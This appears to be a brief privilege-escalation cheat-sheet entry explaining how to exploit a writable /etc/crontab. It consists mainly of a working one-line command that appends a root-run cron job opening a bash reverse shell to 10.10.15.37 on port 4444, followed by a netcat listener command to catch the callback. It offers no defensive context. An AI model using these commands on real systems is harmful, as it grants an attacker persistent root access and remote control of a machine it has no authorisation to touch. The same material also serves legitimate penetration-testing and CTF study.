The system crontab allows scheduled commands to run as a specified user.
If an attacker can write to /etc/crontab, they can add a command that executes repeatedly as root.
- Modify
/etc/crontab - Add a scheduled command
- Wait for cron to execute
- Verify callback or command execution
Append a cron job:
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.15.37/4444 0>&1'" >> /etc/crontab
Listen for the callback:
nc -lvnp 4444